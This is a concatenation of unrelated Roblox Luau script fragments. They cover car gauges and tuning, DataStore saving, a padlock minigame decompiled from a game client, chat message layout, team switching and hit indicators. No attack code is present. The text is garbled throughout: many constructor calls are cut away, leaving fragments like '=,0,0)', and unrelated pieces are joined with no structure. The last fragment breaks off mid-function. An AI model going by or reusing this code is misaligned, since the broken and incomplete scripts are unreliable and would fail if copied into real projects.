--Automatic Gauge Scaling
if autoscaling then local Drive={} if _Tune.Config == "FWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("FL")~= nil then table.insert(Drive,car.Wheels.FL) end if car.Wheels:FindFirstChild("FR")~= nil then table.insert(Drive,car.Wheels.FR) end if car.Wheels:FindFirstChild("F")~= nil then table.insert(Drive,car.Wheels.F) end end if _Tune.Config == "RWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("RL")~= nil then table.insert(Drive,car.Wheels.RL) end if car.Wheels:FindFirstChild("RR")~= nil then table.insert(Drive,car.Wheels.RR) end if car.Wheels:FindFirstChild("R")~= nil then table.insert(Drive,car.Wheels.R) end end local wDia = 0 for i,v in pairs(Drive) do if v.Size.x>wDia then wDia = v.Size.x end end Drive = nil for i,v in pairs(UNITS) do v.maxSpeed = math.ceil(v.scaling*wDia*math.pi*_lRPM/60/_Tune.Ratios[#_Tune.Ratios]/_Tune.FinalDrive) v.spInc = math.max(math.ceil(v.maxSpeed/200)*20,20) end end for i=0,revEnd*2 do local ln = script.Parent.ln:clone() ln.Parent = script.Parent.Tach ln.Rotation = 45 + i * 225 / (revEnd*2) ln.Num.Text = i/2 ln.Num.Rotation = -ln.Rotation if i*500>=math.floor(_pRPM/500)*500 then ln.Frame.BackgroundColor3 =,0,0) if i<revEnd*2 then ln2 = ln:clone() ln2.Parent = script.Parent.Tach ln2.Rotation = 45 + (i+.5) * 225 / (revEnd*2) ln2.Num:Destroy() ln2.Visible=true end end if i%2==0 then ln.Frame.Size =,3,0,10) ln.Frame.Position =,-1,0,100) ln.Num.Visible = true else ln.Num:Destroy() end ln.Visible=true end local lns ="Frame",script.Parent.Speedo) lns.Name = "lns" lns.BackgroundTransparency = 1 lns.BorderSizePixel = 0 lns.Size =,0,0,0) for i=1,90 do local ln = script.Parent.ln:clone() ln.Parent = lns ln.Rotation = 45 + 225*(i/90) if i%2==0 then ln.Frame.Size =,2,0,10) ln.Frame.Position =,-1,0,100) else ln.Frame.Size =,3,0,5) end ln.Num:Destroy() ln.Visible=true end for i,v in pairs(UNITS) do local lnn ="Frame",script.Parent.Speedo) lnn.BackgroundTransparency = 1 lnn.BorderSizePixel = 0 lnn.Size =,0,0,0) lnn.Name = v.units if i~= 1 then lnn.Visible=false end for i=0,v.maxSpeed,v.spInc do local ln = script.Parent.ln:clone() ln.Parent = lnn ln.Rotation = 45 + 225*(i/v.maxSpeed) ln.Num.Text = i ln.Num.TextSize = 14 ln.Num.Rotation = -ln.Rotation ln.Frame:Destroy() ln.Num.Visible=true ln.Visible=true end end if script.Parent.Parent.Parent.IsOn.Value then script.Parent:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end script.Parent.Parent.Parent.IsOn.Changed:connect(function() if script.Parent.Parent.IsOn.Value then script.Parent:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end end) script.Parent.Parent.Adornee=car.Body.Gauges,1000) script.Parent.Parent.Parent.Values.RPM.Changed:connect(function() script.Parent.Tach.Needle.Rotation = 45 + 225 * math.min(1,script.Parent.Parent.Parent.Values.RPM.Value / (revEnd*1000)) end) script.Parent.Parent.Parent.Values.Gear.Changed:connect(function() local gearText = script.Parent.Parent.Parent.Values.Gear.Value if gearText == 0 then gearText = "N" elseif gearText == -1 then gearText = "R" end script.Parent.Gear.Text = gearText end) script.Parent.Parent.Parent.Values.TCS.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Parent.Values.TCS.Value then script.Parent.TCS.TextColor3 =,170/255,0) script.Parent.TCS.TextStrokeColor3 =,170/255,0) if script.Parent.Parent.Values.TCSActive.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible else wait() script.Parent.TCS.Visible = false end else script.Parent.TCS.Visible = true script.Parent.TCS.TextColor3 =,0,0) script.Parent.TCS.TextStrokeColor3 =,0,0) end else script.Parent.TCS.Visible = false end end) script.Parent.Parent.Parent.Values.TCSActive.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Parent.Values.TCSActive.Value and script.Parent.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible elseif not script.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = true else wait() script.Parent.TCS.Visible = false end else script.Parent.TCS.Visible = false end end) script.Parent.TCS.Changed:connect(function() if _Tune.TCSEnabled then if script.Parent.Parent.Parent.Values.TCSActive.Value and script.Parent.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = not script.Parent.TCS.Visible elseif not script.Parent.Parent.Parent.Values.TCS.Value then wait() script.Parent.TCS.Visible = true end else if script.Parent.TCS.Visible then script.Parent.TCS.Visible = false end end end) script.Parent.Parent.Parent.Values.ABS.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Parent.Values.ABS.Value then script.Parent.ABS.TextColor3 =,170/255,0) script.Parent.ABS.TextStrokeColor3 =,170/255,0) if script.Parent.Parent.Parent.Values.ABSActive.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible else wait() script.Parent.ABS.Visible = false end else script.Parent.ABS.Visible = true script.Parent.ABS.TextColor3 =,0,0) script.Parent.ABS.TextStrokeColor3 =,0,0) end else script.Parent.ABS.Visible = false end end) script.Parent.Parent.Parent.Values.ABSActive.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Parent.Values.ABSActive.Value and script.Parent.Parent.Values.Parent.ABS.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible elseif not script.Parent.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = true else wait() script.Parent.ABS.Visible = false end else script.Parent.ABS.Visible = false end end) script.Parent.ABS.Changed:connect(function() if _Tune.ABSEnabled then if script.Parent.Parent.Parent.Values.ABSActive.Value and script.Parent.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = not script.Parent.ABS.Visible elseif not script.Parent.Parent.Parent.Values.ABS.Value then wait() script.Parent.ABS.Visible = true end else if script.Parent.ABS.Visible then script.Parent.ABS.Visible = false end end end) function PBrake() script.Parent.PBrake.Visible = script.Parent.Parent.Parent.Values.PBrake.Value end script.Parent.Parent.Parent.Values.PBrake.Changed:connect(PBrake) function Gear() if script.Parent.Parent.Parent.Values.TransmissionMode.Value == "Auto" then script.Parent.TMode.Text = "A/T" script.Parent.TMode.BackgroundColor3 =,170/255,0) elseif script.Parent.Parent.Parent.Values.TransmissionMode.Value == "Semi" then script.Parent.TMode.Text = "S/T" script.Parent.TMode.BackgroundColor3 =, 170/255, 127/255) else script.Parent.TMode.Text = "M/T" script.Parent.TMode.BackgroundColor3 =,85/255,.5) end end script.Parent.Parent.Parent.Values.TransmissionMode.Changed:connect(Gear) script.Parent.Parent.Parent.Values.Velocity.Changed:connect(function(property) script.Parent.Speedo.Needle.Rotation =45 + 225 * math.min(1,UNITS[currentUnits].scaling*script.Parent.Parent.Parent.Values.Velocity.Value.Magnitude/UNITS[currentUnits].maxSpeed) script.Parent.Speed.Text = math.floor(UNITS[currentUnits].scaling*script.Parent.Parent.Parent.Values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units end) script.Parent.Speed.MouseButton1Click:connect(function() if currentUnits==#UNITS then currentUnits = 1 else currentUnits = currentUnits+1 end for i,v in pairs(script.Parent.Speedo:GetChildren()) do v.Visible=v.Name==UNITS[currentUnits].units or v.Name=="Needle" or v.Name=="lns" end script.Parent.Speed.Text = math.floor(UNITS[currentUnits].scaling*script.Parent.Parent.Values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units end) wait(.1) Gear() PBrake()
--[[ Creates a new copy of the dictionary and sets a value inside it. ]]
function Immutable.Set(dictionary, key, value) local new = {} for k, v in pairs(dictionary) do new[k] = v end new[key] = value return new end
--Don't worry about the rest of the code, except for line 25.
game.Players.PlayerAdded:connect(function(player) wait(.1) local leader ="Folder",player) leader.Name = "Skins" local Cash ="StringValue",leader) Cash.Name = stat Cash.Value = ds:GetAsync(player.UserId) or startamount ds:SetAsync(player.UserId, Cash.Value) Cash.Changed:connect(function() ds:SetAsync(player.UserId, Cash.Value) end) end) game.Players.PlayerRemoving:connect(function(player) wait(.1) ds:SetAsync(player.UserId, player.Skins.Equipped.Value) --Change "Points" to the name of your leaderstat. end)
-- Decompiled with the Synapse X Luau decompiler.
return function(p1) print("starting"); local l__LocalPlayer__1 = game.Players.LocalPlayer; local v2 = require(l__LocalPlayer__1:WaitForChild("PlayerScripts"):WaitForChild("PlayerModule")):GetControls(); local v3 = game["Run Service"]; local l__UserInputService__4 = game:GetService("UserInputService"); local l__TweenService__5 = game:GetService("TweenService"); local l__mouse__6 = l__LocalPlayer__1:GetMouse(); local l__MinigameBackout__7 = script:FindFirstAncestor("MainUI").MinigameBackout; p1.stopcam = true; p1.freemouse = true; p1.hideplayers = 2; local v8 =, 0, 0); local v9 = tick() + 1; local v10 = tick() + 1; local l__Padlock__11 = workspace:FindFirstChild("Padlock", true); local l__Selector__12 = l__Padlock__11:FindFirstChild("Selector", true); l__Padlock__11.ConfirmUI.Enabled = l__UserInputService__4.GamepadEnabled; l__Selector__12.Visible = l__UserInputService__4.GamepadEnabled; local l__WorldCFrame__13 = workspace:FindFirstChild("CamAttachPadlock", true).WorldCFrame; local l__CFrame__1 =; local l__FieldOfView__2 =; local u3 = false; task.spawn(function() for v14 = 1, 100000 do task.wait(); local v15 = l__TweenService__5:GetValue((1 - math.abs(tick() - v9)) / 1, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut); if not (tick() <= v9) then break; end; = l__CFrame__1:Lerp(l__WorldCFrame__13, v15) * p1.csgo; = l__FieldOfView__2 + (30 - l__FieldOfView__2) * v15; end; = l__WorldCFrame__13 * p1.csgo; for v16 = 1, 10000000000000 do task.wait(); = l__WorldCFrame__13 * p1.csgo; if u3 == true then break; end; end; end); local l__ActivateEventPrompt__17 = l__Padlock__11:FindFirstChild("ActivateEventPrompt"); l__ActivateEventPrompt__17.Enabled = false; local l__AnimationController__18 = l__Padlock__11.AnimationController; local v19 = {}; for v20, v21 in pairs(l__Padlock__11:FindFirstChild("Animations"):GetChildren()) do v19[v21.Name] = l__AnimationController__18:LoadAnimation(v21); end; v19.start:Play(0.1); v19.idle:Play(0.2); local v22 = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }; local l__MinigameBackout__23 = script.Parent.Parent.Parent.Parent.MinigameBackout; l__MinigameBackout__23.Visible = true; l__TweenService__5:Create(l__MinigameBackout__23,, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut, 3, true), { ImageColor3 = Color3.fromRGB(107, 129, 179), Size =, 60, 0.1, 60) }):Play(); local u4 = nil; local u5 = nil; local u6 = nil; local u7 = nil; local u8 = v10; local function u9(p2, p3) p2.NumberUI.TextLabel.Text = p3; for v24, v25 in pairs(p2:GetChildren()) do if v25:IsA("BasePart") and v25:FindFirstChild("NumberUI") then local v26 = 1; if v25.Name == "NumberTop" then v26 = 2; elseif v25.Name == "NumberBelow" then v26 = -1; elseif v25.Name == "NumberBottom" then v26 = -2; end; local v27 = (p3 + v26) % 10; if v27 == nil then warn("idk lol"); v27 = 0; end; v25.NumberUI.TextLabel.Text = v27; end; end; end; local function u10(p4, p5) if tick() < u8 then return; end; if p5 == nil then p5 = 1; end; local v28 = (tonumber(p4.NumberUI.TextLabel.Text) + p5) % 10; if v28 == nil then warn("idk lol"); v28 = 0; end; p4.Sound.Pitch = 1 + p5 / 10 + v28 / 30; p4.Sound:Play(); u9(p4, v28); local l__Weld__29 = p4.Weld; l__Weld__29.C0 = l__Weld__29.C0 * CFrame.Angles(math.rad(45 * p5), 0, 0); l__TweenService__5:Create(p4.Weld,, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { C0 =, 0, 0) }):Play(); end; local function u11() v19.input:Play(); u8 = tick() + 1; local v30 = ""; for v31 = 1, 5 do for v32, v33 in pairs(l__Padlock__11:GetDescendants()) do if v33.Name == "Number" and v33:IsA("BasePart") and v33:GetAttribute("ID") == v31 then v30 = v30 .. tostring(v33.NumberUI.TextLabel.Text); end; end; end; p1.remotes:WaitForChild("PL"):FireServer(v30); wait(0.3); for v34, v35 in pairs(l__Padlock__11:GetDescendants()) do if v35.Name == "Number" and v35:IsA("BasePart") then local l__Weld__36 = v35.Weld; l__Weld__36.C0 = l__Weld__36.C0 * CFrame.Angles(3.141592653589793, 0, 0); l__TweenService__5:Create(v35.Weld,, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { C0 =, 0, 0) }):Play(); u9(v35, 0); end; end; end; local function u12() if u3 == false then pcall(function() u4:Disconnect(); u5:Disconnect(); u6:Disconnect(); u7:Disconnect(); end); u3 = true; p1.hideplayers = 0; l__MinigameBackout__23.Visible = false; v19["end"]:Play(); v19.idle:Stop(); l__Padlock__11.ConfirmUI.Enabled = false; l__Selector__12.Visible = false; local l__basecamcf__37 = p1.basecamcf; local v38 = tick() + 0.5; local l__CFrame__13 =; local l__FieldOfView__14 =; task.spawn(function() for v39 = 1, 100000 do task.wait(); local v40 = l__TweenService__5:GetValue((0.5 - math.abs(tick() - v38)) / 0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut); if not (tick() <= v38) then break; end; = l__CFrame__13:Lerp(p1.basecamcf, v40) * p1.csgo; = l__FieldOfView__14 + (p1.fovspring - l__FieldOfView__14) * v40; end; p1.stopcam = false; p1.freemouse = false; l__ActivateEventPrompt__17.Enabled = l__Padlock__11.Padlocked.Value; end); end; end; local u15 = 1; u4 = l__UserInputService__4.InputBegan:Connect(function(p6) if p6.UserInputType == Enum.UserInputType.MouseButton1 or p6.UserInputType == Enum.UserInputType.Touch then local v41 =, p6.Position.Y); local v42, v43 = workspace:FindPartOnRay(, v41.Direction * 1000), p1.char); if v42.Name == "Number" then u10(v42); return; end; if v42.Name == "ConfirmButton" or v42.Name == "ConfirmUIHolder" then u11(); return; end; elseif p6.UserInputType == Enum.UserInputType.MouseButton2 then local v44 =, p6.Position.Y); local v45, v46 = workspace:FindPartOnRay(, v44.Direction * 1000), p1.char); if v45.Name == "Number" then u10(v45, -1); return; end; if v45.Name == "ConfirmButton" then u11(); return; end; else if p6.KeyCode == Enum.KeyCode.ButtonA then u11(); return; end; if p6.KeyCode == Enum.KeyCode.ButtonB then u12(); return; end; if p6.KeyCode == Enum.KeyCode.ButtonX or p6.KeyCode == Enum.KeyCode.DPadUp then for v47, v48 in pairs(l__Padlock__11:GetDescendants()) do if v48.Name == "Number" and v48:IsA("BasePart") and v48:GetAttribute("ID") == u15 then u10(v48); end; end; return; end; if p6.KeyCode == Enum.KeyCode.DPadDown then for v49, v50 in pairs(l__Padlock__11:GetDescendants()) do if v50.Name == "Number" and v50:IsA("BasePart") and v50:GetAttribute("ID") == u15 then u10(v50, -1); end; end; return; end; if p6.KeyCode == Enum.KeyCode.DPadLeft or p6.KeyCode == Enum.KeyCode.DPadRight then if p6.KeyCode == Enum.KeyCode.DPadRight then u15 = math.clamp(u15 + 1, 1, 5); else u15 = math.clamp(u15 - 1, 1, 5); end; for v51, v52 in pairs(l__Padlock__11:GetDescendants()) do if v52.Name == "Number" and v52:IsA("BasePart") and v52:GetAttribute("ID") == u15 then l__Selector__12.Parent = v52.NumberUI.TextLabel; end; end; end; end; end); u5 = l__MinigameBackout__23.MouseButton1Down:Connect(u12); u6 = l__Padlock__11.Padlocked.Changed:connect(function() if l__Padlock__11.Padlocked.Value == false then u12(); end; end); u7 = l__LocalPlayer__1.Character.Humanoid.HealthChanged:Connect(function() if l__LocalPlayer__1.Character.Humanoid.Health < 0.1 then u12(); end; end); if l__Padlock__11.Padlocked.Value == false then u12(); end; spawn(function() local v53, v54, v55 = pairs(l__Padlock__11:GetDescendants()); while true do local v56, v57 = v53(v54, v55); if not v56 then break; end; if v57.Name == "Number" and v57:IsA("BasePart") then delay(v57:GetAttribute("ID") / 20, function() l__TweenService__5:Create(v57,, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut, 1, true), { Color = Color3.fromRGB(159, 160, 221) }):Play(); end); end; if v57.Name == "ConfirmButton" and v57:IsA("BasePart") then delay(2, function() l__TweenService__5:Create(v57,, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut, 0, true), { Color = Color3.fromRGB(139, 255, 158) }):Play(); end); end; end; end); if u3 == true then return; end; end;
-- tu dois assigner la bonne couleur
local plr = script.Parent.Parent.Parent.Parent.Parent.Parent.Name local normalBorderColor = script.Parent.TextLabel.TextColor.Color function Click(mouse) if game.Players[plr].TeamColor ~= game.Teams:FindFirstChild(script.Parent.Name).TeamColor then game.Players[plr].TeamColor = game.Teams:FindFirstChild(script.Parent.Name).TeamColor script.Parent.Border.ImageColor3 =, 1, 0) wait(.25) script.Parent.Border.ImageColor3 = normalBorderColor wait(.1) if script.Parent.Parent.Parent.CanKill.Value == true then script.Parent.Parent.Parent.Parent.Parent.Parent.Character.Humanoid.Health = 0 end else script.Parent.Border.ImageColor3 =, 0, 0) wait(.25) script.Parent.Border.ImageColor3 = normalBorderColor wait(.1) end end script.Parent.MouseButton1Click:connect(Click)
Tune.SusVisible = false -- Spring Visible Tune.WsBVisible = false -- Wishbone Visible Tune.SusRadius = .2 -- Suspension Coil Radius Tune.SusThickness = .1 -- Suspension Coil Thickness Tune.SusColor = "Really black" -- Suspension Color [BrickColor] Tune.SusCoilCount = 8 -- Suspension Coil Count Tune.WsColor = "Black" -- Wishbone Color [BrickColor] Tune.WsThickness = .1 -- Wishbone Rod Thickness
-- actiontime should always be 0 unless you are using the two commands above for the delay
--Torque Curve Tune.Horsepower = 340 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 6000 -- Use sliders to manipulate values Tune.Redline = 6700 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 5500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 4.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 150 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
--play anim for a certain amunt of time
function module.playAnimationForDuration(anim, duration, hum) local animationTrack = hum:LoadAnimation(anim) local speed = animationTrack.Length / duration animationTrack:AdjustSpeed(speed) animationTrack:Play() end return module
--Switch between eraser and brush when their respective buttons are pressed
brushSettings.BrushButton.MouseButton1Click:Connect(function() erasing = false brushSettings.BrushButton.BackgroundColor3 = Color3.fromRGB(200, 200, 200) brushSettings.EraserButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) end) brushSettings.EraserButton.MouseButton1Click:Connect(function() erasing = true brushSettings.EraserButton.BackgroundColor3 = Color3.fromRGB(200, 200, 200) brushSettings.BrushButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) end)
-- Makes copies of all the admin tools and puts them in target
local function CloneAdminTools(target) for _, tool in pairs(AdminTools:GetChildren()) do local toolClone = tool:Clone() toolClone.Parent = target end end
--- Skill
local UIS = game:GetService("UserInputService") local plr = game.Players.LocalPlayer local Mouse = plr:GetMouse() local Debounce = true Player = game.Players.LocalPlayer UIS.InputBegan:Connect(function(Input) if Input.KeyCode == Enum.KeyCode.C and Debounce == true and Tool.Equip.Value == true and Tool.Active.Value == "None" then Debounce = false Tool.Active.Value = "LightKick" Track1 = Player.Character.Humanoid:LoadAnimation(script.Anim01) Track1:Play() wait(0.15) script.Fire:FireServer(plr) local hum = Player.Character.Humanoid for i = 1,30 do wait() hum.CameraOffset = math.random(-1,1), math.random(-1,1), math.random(-1,1) ) end hum.CameraOffset =,0,0) Tool.Active.Value = "None" wait(2) Debounce = true end end)
--!strict -- upstream: --[[* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. * * @flow ]]
--------RIGHT DOOR --------
game.Workspace.doorright.l11.BrickColor = game.Workspace.doorright.l12.BrickColor = game.Workspace.doorright.l13.BrickColor = game.Workspace.doorright.l41.BrickColor = game.Workspace.doorright.l42.BrickColor = game.Workspace.doorright.l43.BrickColor = game.Workspace.doorright.l71.BrickColor = game.Workspace.doorright.l72.BrickColor = game.Workspace.doorright.l73.BrickColor = game.Workspace.doorright.pillar.BrickColor =
-- upstream: --[[* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. * * @flow ]]
local invariant = require(script.Parent.Parent.invariant)
-- Implements Javascript's `` as defined below --
return function<T, U, V>(t: Array<T>, callback: callbackFn<T, U> | callbackFnWithThisArg<T, U, V>, thisArg: V?): Array<U> if typeof(t) ~= "table" then error(string.format(" called on %s", typeof(t))) end if typeof(callback) ~= "function" then error("callback is not a function") end local len = #t local A = {} local k = 1 while k <= len do local kValue = t[k] if kValue ~= nil then local mappedValue if thisArg ~= nil then mappedValue = (callback :: callbackFnWithThisArg<T, U, V>)(thisArg, kValue, k, t) else mappedValue = (callback :: callbackFn<T, U>)(kValue, k, t) end A[k] = mappedValue end k += 1 end return A end
-------- public facing API ----------------
local moduleApiTable = {} function moduleApiTable:Create(instanceType) return function(data) local obj = local parent = nil for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj elseif k == 'Parent' then parent = v else obj[k] = v end end if parent then obj.Parent = parent end return obj end end
-- SirNoobly
local hat = script.Parent hat.PrimaryPart = hat:WaitForChild("Head") -- Make sure the Head is the same size as a normal Head. function weldParts(part0, part1) -- welds the 2 parts based on their position local newWeld ="Weld") newWeld.Part0 = part0 newWeld.Part1 = part1 newWeld.C0 = newWeld.C1 = part1.CFrame:toObjectSpace(part0.CFrame) newWeld.Parent = part0 end hat.Head.Touched:connect(function(hit) if hit.Parent:FindFirstChild("Humanoid") and not hit.Parent:FindFirstChild("")then else return end for _, v in pairs (hit.Parent:GetChildren()) do -- removes all hats if v:IsA("1") then v:Destroy() end end local head = hit.Parent:FindFirstChild("Head") local newHat = hat:Clone() newHat:FindFirstChild("HatScript"):Destroy() newHat:SetPrimaryPartCFrame(head.CFrame) -- puts the head into the head newHat.PrimaryPart:Destroy() for _, part in pairs (newHat:GetChildren()) do if part:IsA("BasePart") then weldParts(head, part) part.CanCollide = false part.Anchored = false end end newHat.Parent = hit.Parent end)
-- Local player
local player = game.Players.LocalPlayer local character = player.Character or player.CharacterAdded:wait() local PlayerGui = player:WaitForChild("PlayerGui")
--// Above was taken directly from Util.GetStringTextBounds() in the old chat corescripts.
function methods:GetMessageHeight(BaseMessage, BaseFrame, xSize) xSize = xSize or BaseFrame.AbsoluteSize.X local textBoundsSize = self:GetStringTextBounds(BaseMessage.Text, BaseMessage.Font, BaseMessage.TextSize,, 1000)) return textBoundsSize.Y end function methods:GetNumberOfSpaces(str, font, textSize) local strSize = self:GetStringTextBounds(str, font, textSize) local singleSpaceSize = self:GetStringTextBounds(" ", font, textSize) return math.ceil(strSize.X / singleSpaceSize.X) end function methods:CreateBaseMessage(message, font, textSize, chatColor) local BaseFrame = self:GetFromObjectPool("Frame") BaseFrame.Selectable = false BaseFrame.Size =, 0, 0, 18) BaseFrame.Visible = true BaseFrame.BackgroundTransparency = 1 local messageBorder = 8 local BaseMessage = self:GetFromObjectPool("TextLabel") BaseMessage.Selectable = false BaseMessage.Size =, -(messageBorder + 6), 1, 0) BaseMessage.Position =, messageBorder, 0, 0) BaseMessage.BackgroundTransparency = 1 BaseMessage.Font = font BaseMessage.TextSize = textSize BaseMessage.TextXAlignment = Enum.TextXAlignment.Left BaseMessage.TextYAlignment = Enum.TextYAlignment.Top BaseMessage.TextTransparency = 0 BaseMessage.TextStrokeTransparency = 0.75 BaseMessage.TextColor3 = chatColor BaseMessage.TextWrapped = true BaseMessage.Text = message BaseMessage.Visible = true BaseMessage.Parent = BaseFrame return BaseFrame, BaseMessage end function methods:AddNameButtonToBaseMessage(BaseMessage, nameColor, formatName, playerName) local speakerNameSize = self:GetStringTextBounds(formatName, BaseMessage.Font, BaseMessage.TextSize) local NameButton = self:GetFromObjectPool("TextButton") NameButton.Selectable = false NameButton.Size =, speakerNameSize.X, 0, speakerNameSize.Y) NameButton.Position =, 0, 0, 0) NameButton.BackgroundTransparency = 1 NameButton.Font = BaseMessage.Font NameButton.TextSize = BaseMessage.TextSize NameButton.TextXAlignment = BaseMessage.TextXAlignment NameButton.TextYAlignment = BaseMessage.TextYAlignment NameButton.TextTransparency = BaseMessage.TextTransparency NameButton.TextStrokeTransparency = BaseMessage.TextStrokeTransparency NameButton.TextColor3 = nameColor NameButton.Text = formatName NameButton.Visible = true NameButton.Parent = BaseMessage local clickedConn = NameButton.MouseButton1Click:connect(function() self:NameButtonClicked(NameButton, playerName) end) local changedConn = nil changedConn = NameButton.Changed:connect(function(prop) if prop == "Parent" then clickedConn:Disconnect() changedConn:Disconnect() end end) return NameButton end function methods:AddPrefixLabelToBaseMessage(BaseMessage, prefixColor, formatPrefix) local speakerNameSize = self:GetStringTextBounds(formatPrefix, BaseMessage.Font, BaseMessage.TextSize) local PrefixLabel = self:GetFromObjectPool("TextLabel") PrefixLabel.Selectable = false PrefixLabel.Size =, speakerNameSize.X, 0, speakerNameSize.Y) PrefixLabel.Position =, 0, 0, 0) PrefixLabel.BackgroundTransparency = 1 PrefixLabel.Font = BaseMessage.Font PrefixLabel.TextSize = BaseMessage.TextSize PrefixLabel.TextXAlignment = BaseMessage.TextXAlignment PrefixLabel.TextYAlignment = BaseMessage.TextYAlignment PrefixLabel.TextTransparency = BaseMessage.TextTransparency PrefixLabel.TextStrokeTransparency = BaseMessage.TextStrokeTransparency PrefixLabel.TextColor3 = prefixColor PrefixLabel.Text = formatPrefix PrefixLabel.Visible = true PrefixLabel.Parent = BaseMessage return PrefixLabel end function methods:AddChannelButtonToBaseMessage(BaseMessage, channelColor, formatChannelName, channelName) local channelNameSize = self:GetStringTextBounds(formatChannelName, BaseMessage.Font, BaseMessage.TextSize) local ChannelButton = self:GetFromObjectPool("TextButton") ChannelButton.Selectable = false ChannelButton.Size =, channelNameSize.X, 0, channelNameSize.Y) ChannelButton.Position =, 0, 0, 0) ChannelButton.BackgroundTransparency = 1 ChannelButton.Font = BaseMessage.Font ChannelButton.TextSize = BaseMessage.TextSize ChannelButton.TextXAlignment = BaseMessage.TextXAlignment ChannelButton.TextYAlignment = BaseMessage.TextYAlignment ChannelButton.TextTransparency = BaseMessage.TextTransparency ChannelButton.TextStrokeTransparency = BaseMessage.TextStrokeTransparency ChannelButton.TextColor3 = channelColor ChannelButton.Text = formatChannelName ChannelButton.Visible = true ChannelButton.Parent = BaseMessage local clickedConn = ChannelButton.MouseButton1Click:connect(function() self:ChannelButtonClicked(ChannelButton, channelName) end) local changedConn = nil changedConn = ChannelButton.Changed:connect(function(prop) if prop == "Parent" then clickedConn:Disconnect() changedConn:Disconnect() end end) return ChannelButton end function GetWhisperChannelPrefix() if ChatConstants.WhisperChannelPrefix then return ChatConstants.WhisperChannelPrefix end return "To " end function methods:NameButtonClicked(nameButton, playerName) if not self.ChatWindow then return end if ChatSettings.ClickOnPlayerNameToWhisper then local player = Players:FindFirstChild(playerName) if player and player ~= LocalPlayer then local whisperChannel = GetWhisperChannelPrefix() ..playerName if self.ChatWindow:GetChannel(whisperChannel) then self.ChatBar:ResetCustomState() local targetChannelName = self.ChatWindow:GetTargetMessageChannel() if targetChannelName ~= whisperChannel then self.ChatWindow:SwitchCurrentChannel(whisperChannel) end self.ChatBar:ResetText() self.ChatBar:CaptureFocus() elseif not self.ChatBar:IsInCustomState() then local whisperMessage = "/w " ..playerName self.ChatBar:CaptureFocus() self.ChatBar:SetText(whisperMessage) end end end end function methods:ChannelButtonClicked(channelButton, channelName) if not self.ChatWindow then return end if ChatSettings.ClickOnChannelNameToSetMainChannel then if self.ChatWindow:GetChannel(channelName) then self.ChatBar:ResetCustomState() local targetChannelName = self.ChatWindow:GetTargetMessageChannel() if targetChannelName ~= channelName then self.ChatWindow:SwitchCurrentChannel(channelName) end self.ChatBar:ResetText() self.ChatBar:CaptureFocus() end end end function methods:RegisterChatWindow(chatWindow) self.ChatWindow = chatWindow self.ChatBar = chatWindow:GetChatBar() end function methods:GetFromObjectPool(className) if self.ObjectPool == nil then return end return self.ObjectPool:GetInstance(className) end function methods:RegisterObjectPool(objectPool) self.ObjectPool = objectPool end
-- Indicator class
local Indicator = {} Indicator.all = {} function Indicator:new(newIndicator) local newIndicator = newIndicator or {} -- Properties newIndicator.time = newIndicator.time or 1 newIndicator.position = newIndicator.position or newIndicator.timeCreated = tick() newIndicator.timeExpire = tick() + newIndicator.time newIndicator.alive = true newIndicator.frame = frTemplate:clone() newIndicator.frame.Parent = gui newIndicator.frame.Archivable = false setmetatable(newIndicator, Indicator) self.__index = self table.insert(Indicator.all, newIndicator) newIndicator:update() return newIndicator end function Indicator:expire() self.alive = false -- Cleanup resources self.frame:Destroy() -- Remove from all for i = 1, #Indicator.all do if self == Indicator.all[i] then table.remove(Indicator.all, i) break end end end function Indicator:setAngle(angleRadians) assert(self, "use colon") if not self.alive then return end local angleDegrees = angleRadians * (180 / math.pi) self.frame.Position = .5, math.cos(angleRadians) * radius + self.frame.AbsoluteSize.X / -2, .5, math.sin(angleRadians) * radius + self.frame.AbsoluteSize.Y / -2 ) self.frame.Rotation = angleDegrees + 90 end function Indicator:update() if tick() >= self.timeExpire then self:expire() else local perc = (tick() - self.timeCreated) / self.time self:setAngle(getCameraAngle(camera) - angleBetweenPoints(camera.Focus.p, self.position) - math.pi / 2) 